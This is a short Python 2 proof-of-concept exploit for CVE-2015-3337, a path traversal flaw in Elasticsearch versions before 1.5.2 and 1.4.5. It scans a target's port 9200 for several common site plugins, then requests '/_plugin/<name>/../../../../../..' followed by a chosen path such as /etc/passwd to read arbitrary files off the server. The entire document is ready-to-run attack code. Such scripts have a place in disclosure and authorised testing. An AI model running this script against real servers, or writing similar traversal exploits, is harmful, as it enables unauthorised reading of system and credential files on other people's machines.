#!/usr/bin/python
# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign
# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/

import socket, sys

print "!dSR ElasticPwn - for CVE-2015-3337\n"
if len(sys.argv) <> 3:
        print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
        sys.exit()

port = 9200 # Default ES http port
host = sys.argv[1]
fpath = sys.argv[2]

def grab(plugin):
		socket.setdefaulttimeout(3)
		s = socket.socket()
		s.connect((host,port))
		s.send("GET /_plugin/"+plugin+"/../../../../../.."+fpath+ " HTTP/1.0\n"
			"Host: "+host+"\n\n")
		file = s.recv(2048)
		print "	[*] Trying to retrieve "+str(fpath)+":"
		if ("HTTP/1.0 200 OK" in file): 
			print "\n"+file
		else:
		    print "[-] File Not Found or system not vulnerable"	

def pfind(plugin):
	try:
		socket.setdefaulttimeout(3)
		s = socket.socket()
		s.connect((host,port))
		s.send("GET /_plugin/"+plugin+"/ HTTP/1.0\n"
			"Host: "+host+"\n\n")
		file = s.recv(16)
		print "[*] Trying to find plugin "+plugin+":"
		if ("HTTP/1.0 200 OK" in file): 
			print "[+] Plugin found!"
			grab(plugin)
			sys.exit()
		else:
		    print "[-]  Not Found "	
	except Exception, e:
		print "[-] Error connecting to "+host+" "+str(e)
		sys.exit()

# Include more plugin names to check if they are installed
pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head'] 

for plugin in pluginList:
	pfind(plugin)